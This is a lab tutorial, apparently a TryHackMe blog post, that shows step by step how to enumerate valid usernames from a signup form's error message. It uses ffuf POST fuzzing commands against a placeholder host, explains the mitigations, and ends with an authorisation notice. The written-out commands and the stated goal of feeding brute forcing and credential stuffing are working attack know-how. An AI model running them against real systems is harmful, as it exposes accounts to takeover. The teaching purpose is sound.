Practical Step-by-Step Authentication Testing Guide
Introduction
Authentication mechanisms often reveal sensitive information through error messages. One common vulnerability is username enumeration, where a web application confirms whether a username exists.
In this practical exercise, we will:
Identify valid usernames
Use
ffuffor automated fuzzingExtract confirmed usernames
Create a usable list for further authentication testing
Target endpoint:
http://MACHINE_IP/customers/signup
1️⃣ Understanding the Vulnerability
Visit:
http://MACHINE_IP/customers/signup
Try registering with:
Username: admin
Email: test@test.com
Password: test123
Confirm Password: test123
If you receive:
An account with this username already exists
This confirms:
The username exists
The application leaks information
The system is vulnerable to username enumeration
This behavior allows attackers to build a list of valid accounts.
2️⃣ Lab Requirements
You need:
Kali Linux / TryHackMe AttackBox
ffufinstalledSecLists wordlist
Check if ffuf is installed:
ffuf -h
If not installed:
sudo apt install ffuf
Install SecLists if needed:
sudo apt install seclists
Wordlist path:
/usr/share/wordlists/SecLists/Usernames/Names/names.txt
3️⃣ Crafting the FFUF Command
We will send POST requests to the signup form.
Full Command:
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt \
-X POST \
-d "username=FUZZ&email=test@test.com&password=test123&cpassword=test123" \
-H "Content-Type: application/x-www-form-urlencoded" \
-u http://MACHINE_IP/customers/signup \
-mr "username already exists"
4️⃣ Breaking Down the Command
| Parameter | Purpose |
|---|---|
-w | Wordlist location |
-X POST | Use POST request |
-d | Data sent in form |
FUZZ | Replaced by each username |
-H | Header for form submission |
-u | Target URL |
-mr | Match response containing text |
The keyword FUZZ is replaced automatically by each entry from the wordlist.
5️⃣ Running the Attack
Execute the command.
ffuf will:
Send thousands of POST requests
Insert each username into the form
Check responses
Display only matches containing:
username already exists
6️⃣ Interpreting Results
Example output:
admin
john
michael
david
These usernames exist in the system.
Only those displayed by ffuf are valid.
7️⃣ Creating valid_usernames.txt
Now create a file:
nano valid_usernames.txt
Add discovered usernames:
admin
john
michael
david
Save the file.
Verify:
cat valid_usernames.txt
8️⃣ Automating Output Saving (Optional)
Instead of copying manually:
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt \
-X POST \
-d "username=FUZZ&email=test@test.com&password=test123&cpassword=test123" \
-H "Content-Type: application/x-www-form-urlencoded" \
-u http://MACHINE_IP/customers/signup \
-mr "username already exists" \
-of csv -o results.csv
Then extract usernames from results.csv.
9️⃣ Why This Attack Works
The flaw exists because:
The application distinguishes between:
Existing username
New username
It provides different error messages
Secure applications should respond with:
Registration failed
Without revealing if the username exists.
🔐 Security Mitigation
Developers should:
Use generic error messages
Implement rate limiting
Add CAPTCHA
Log suspicious repeated attempts
🎯 Final Outcome
At the end of this exercise, you should have:
valid_usernames.txt
Containing confirmed usernames for:
Password brute forcing
Credential stuffing
Further authentication testing
Educational Purpose Notice
This exercise must only be performed:
In lab environments
On machines you are authorized to test
In platforms like TryHackMe or HackTheBox
Unauthorized testing is illegal.
No comments:
Post a Comment